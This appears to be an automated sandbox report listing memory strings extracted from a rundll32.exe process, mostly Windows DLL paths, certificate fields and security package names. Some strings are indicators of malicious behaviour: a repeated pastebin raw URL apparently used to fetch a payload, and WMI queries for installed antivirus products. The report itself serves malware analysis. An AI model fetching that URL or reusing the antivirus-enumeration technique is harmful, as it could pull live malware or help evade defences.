Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: path=c:\program files (x86)\common files\oracle\java\javapath;c:\windows\system32;c:\windows;c:\windows\system32\wbem;c:\windows\system32\windowspowershell\v1.0\;c:\windows\system32\openssh\;c:\users\user\appdata\local\microsoft\windowsapps;q	memstr_92a7d350-7
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: clsid\{e7d35cfa-348b-485e-b524-252725d697ca}oh	memstr_fed12d10-2
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: `7tcc	memstr_cb26a4d9-0
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\wt	memstr_b91e040f-5
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: decdx	memstr_2f8a6cc1-e
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\system32\wbem\wbemsvc.dlllm	memstr_9ca56034-3
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\system32\wbem\fastprox.dlll9*	memstr_cc7693fe-8
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\system32\winhttpcom.dllll&*	memstr_47412e98-9
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cross-certificate distribution pointss*	memstr_3d944714-f
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bhttps://pastebin.com/raw/zelzp1yrile_x*	memstr_91d89cc5-f
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: processor_identifier=intel64 family 6 model 143 stepping 8, genuineintel	memstr_89730872-c
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: processor_identifier=intel64 family 6 model 143 stepping 8, genuineintelr*	memstr_0eb8fb49-2
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /raw/zelzp1yrtem32\wbem\wbemsvc.dlllt	memstr_e7071f19-d
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\system32\wbem\wbemdisp.dlll	memstr_bab3666b-1
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: windows hardware driver verification	memstr_e2f3ca36-8
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\system32\mskeyprotect.dllll	memstr_d800a7a9-4
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: windows system component verification	memstr_8786227c-2
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\system32\wbem\fastprox.dlll	memstr_a7ae35fa-0
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bhttps://pastebin.com/raw/zelzp1yrl	memstr_2dc54b05-0
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: winhttprequest component version 5.1l	memstr_66fd5ab5-2
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\system32\wbem\wbemsvc.dllli!+	memstr_df61b246-d
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 70c50a17-5fb4-415f-b976-2ce9ec638440ubl[+	memstr_673c346f-1
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: protected process light verificationm+	memstr_b3a84235-3
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: attestation identity key certificate	memstr_2e4821d4-7
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: windows software extension verification	memstr_8c80f1a1-6
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endorsement key certificate verified	memstr_3cfab30e-b
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dnsresolver	memstr_19f98763-2
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: epmapper	memstr_f3ad9ff8-3
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 68fd1	memstr_82cb5964-4
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kerberos68fd1	memstr_4da8b28d-9
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: systemroot=c:\windows	memstr_8c038851-2
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: epmapper7,	memstr_140d0a4d-2
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: epmapper#,	memstr_7d2f400e-a
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: credssp.dll+,	memstr_34be19f2-b
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft kerberos v1.0	memstr_516f2f23-c
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft kerberos v1.0/,	memstr_e3305c98-e
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: userdomain=brok-pc	memstr_67ce645b-f
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: userdomain=user-pc[,	memstr_5ba1ad2c-2
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: epmapperllk,	memstr_4222ce8a-f
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ntlm security package	memstr_cd2a9790-2
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ntlm security packageo,	memstr_58f2c007-b
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: schannelw,	memstr_98c75aa1-4
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: windir=c:\windows	memstr_fcce4a3e-8
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: windir=c:\windows{,	memstr_ee9ba5eb-6
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: negotiate	memstr_ece220eb-c
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dnsresolverc,g	memstr_1870bbe3-1
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pku2u security package	memstr_0f023a42-0
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pku2u security packageg,c	memstr_bb74bd96-2
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ctl usagek,o	memstr_ca6304df-7
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: common name	memstr_e4c54207-2
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: locality	memstr_23f4f046-8
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ca version	memstr_f96d9a1e-d
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cmc data	memstr_ad6418c5-2
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pkcs 7 data	memstr_c83b27ad-6
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: initials	memstr_1b66a109-3
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: reg info	memstr_9a86779b-3
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: logotype	memstr_1313b5ce-9
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: crl number	memstr_a63be9da-4
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: user notice	memstr_f06a8887-2
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: biometric	memstr_689fcb05-3
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: key usage	memstr_aaddf58f-d
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sct list	memstr_9f29bdc1-8
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: given name	memstr_01586521-0
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: any purpose	memstr_99225deb-3
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: os version	memstr_bdac8f68-f
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: connection	memstr_6e8d75f3-a
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: keep-alive	memstr_158fb61d-3
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: connectionkeep-alive	memstr_14ded5dc-2
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: p$p!pt	memstr_0eba555c-5
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fl@bx	memstr_83f4ada5-1
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gssapijvm	memstr_7bdcb507-2
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: aw1.3.14.3.2.7	memstr_5c374fb0-a
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: aw1.3.14.3.2.7-	memstr_60bd5c2b-d
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: essreceiptdecodeex	memstr_f466cc5b-a
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #p*6-	memstr_c0e273cd-0
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: https://pastebin.com/raw/zelzp1yr	memstr_bc784002-1
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: https://pastebin.com/raw/zelzp1yrem$-	memstr_06ca438b-d
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: p$p!p	memstr_eb5f831a-b
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 5w0@}	memstr_d825879c-6
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 4tl-i	memstr_036c8398-8
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: userdomain_roamingprofile=brok-pc	memstr_219b361f-6
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: digest authentication for windows	memstr_ed7ab3a5-c
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: (assm	memstr_328658ed-3
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: enhanced key usage	memstr_b658f133-3
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: unstructured name	memstr_fb2955b9-5
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: basic constraints	memstr_b581eb10-a
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: challenge password	memstr_cf1f9368-a
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: essmlhistorydecodeex	memstr_26364ba1-4
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: smime capabilities	memstr_c015e8c4-2
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: prefer signed data	memstr_4b28ba64-8
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: esscontenthintdecodeex	memstr_d8bb5dca-0
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: clsid\{1b1cad8c-2dab-11d2-b604-00104b703efd}(	memstr_69e5e325-c
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: clsid\{172bddf8-ceea-11d1-8b05-00600806d9b6}	memstr_602fbc6c-2
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: clsid\{1b1cad8c-2dab-11d2-b604-00104b703efd}	memstr_7efad745-9
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rsa1	memstr_cabfe656-2
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #\'g7	memstr_cfdbe7f3-3
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: clsid\{275c23e2-3747-11d0-9fea-00aa003f8646}	memstr_6808c0d1-f
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rsa1p	memstr_9f4ce902-d
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: clsid\{2087c2f4-2cef-4953-a8ab-66779b670495}	memstr_d4389d4b-2
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ^j^@m	memstr_57c7b43c-9
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: g/ 6,&	memstr_7e5c4682-7
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: clsid\{172bddf8-ceea-11d1-8b05-00600806d9b6}x	memstr_f032e9f2-3
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\syswow64\inetcomm.dll+	memstr_7c00c10e-4
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.3.132.0.33	memstr_39788172-b
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.3.132.0.33nistp224ecdhcryptoidinfoeccparameters	memstr_c1a30eb4-b
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @eckp	memstr_4db7b400-4
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.3.132.0.34	memstr_54256d36-7
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.3.132.0.34nistp384ecdhcryptoidinfoeccparameters	memstr_d65a8e3c-d
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t&v\|t&v	memstr_7b01fa51-f
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\syswow64\negoexts.dll	memstr_83224196-f
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\syswow64\kerberos.dll	memstr_a75296f7-7
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\syswow64\schannel.dll	memstr_e11f90b1-3
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft credssp security provider	memstr_ca9e2e79-4
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dasyc	memstr_8d8b36e4-2
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\system32\schannel.dll/!	memstr_3465275b-a
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\system32\ncryptsslp.dll	memstr_c89139ad-9
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: security=impersonation dynamic truew!	memstr_853dc36f-d
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\syswow64\wdigest.dll	memstr_16ad0757-b
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\system32\winhttpcom.dll	memstr_705201dc-e
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: security=impersonation dynamic true	memstr_a7db0434-d
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $p!pt	memstr_ee3ff1b4-d
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\syswow64\winnlsres.dll	memstr_729c356c-0
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: security=impersonation dynamic true?"	memstr_ff10fbb9-3
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: qualified certificate statements%"	memstr_6f444abd-0
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\system32\cryptbase.dlldy"	memstr_5fb47d83-9
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.3.6.1.4.1.311.80.1	memstr_971d86bb-0
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.3.6.1.4.1.311.80.1document encryptiong"	memstr_ef6a0829-0
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: early launch anti-malware driverm"	memstr_89177ac1-7
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: enforce certificate chain policya"m	memstr_7f6913d6-f
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: directory service email replication	memstr_f39be502-8
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: serialised signature serial number	memstr_9b6faf01-b
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: certificate template information	memstr_c3295f0e-5
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: on-line certificate status protocol	memstr_b7f79506-7
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: lmemh	memstr_4c41f584-c
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0u0u&#	memstr_d9566a6d-6
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tls-server-end-point:h	memstr_2cd1a9ea-1
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 5 tls-server-end-point:h	memstr_14ab90fe-7
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft root certificate authority 2010	memstr_041ef0e8-a
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: oem windows system component verification	memstr_b9f9a3ea-7
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: windows third-party application component	memstr_2d083665-4
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0u0u6$	memstr_c9f6801c-e
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft root certificate authority 2011f$	memstr_65c7e3cd-2
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: lmemhp	memstr_62e2188b-e
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rok-pc	memstr_e9d68c9a-b
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 192.168.2.10	memstr_a582db0e-0
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: :3yor4	memstr_6df97f95-8
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dx!pp	memstr_ce5f65be-7
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: a132c1acf46}	memstr_51cc0ed7-9
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: windowsdefender://	memstr_85ce94dd-a
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %programfiles%\windows defende	memstr_a9128bd6-7
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: a132c1acf46}windowsdefender://%programfiles%\windows defende	memstr_9669ca08-e
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hu, 05 oct 2023 09:37:28 gmt	memstr_cca6b2f7-7
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hu, 05 oct 2023 09:37:28 gmt`	memstr_02a5f5b3-a
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: brok-pc	memstr_97085305-f
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: root\securitycenter2	memstr_156dc2dd-e
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: user-pcroot\securitycenter2=	memstr_eb0abf7e-d
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: antivirusproduct	memstr_ef49f4fa-7
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: displayname	memstr_efe685ff-9
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: antivirusproductdisplayname	memstr_56680750-e
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: string	memstr_1448742b-7
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: not_null	memstr_2ab72a52-6
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: instanceguid	memstr_05bb8952-d
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: stringnot_nullinstanceguid	memstr_cd7536d7-f
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pathtosignedproductexe	memstr_c88ffbb3-0
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: stringnot_nullpathtosignedproductexe	memstr_25631177-1
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pathtosignedreportingexe	memstr_8705f1ad-2
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: stringnot_nullpathtosignedreportingexe	memstr_d0bdd958-5
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: productstate	memstr_e5fa0c38-6
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: stringnot_nullproductstate	memstr_b809e693-c
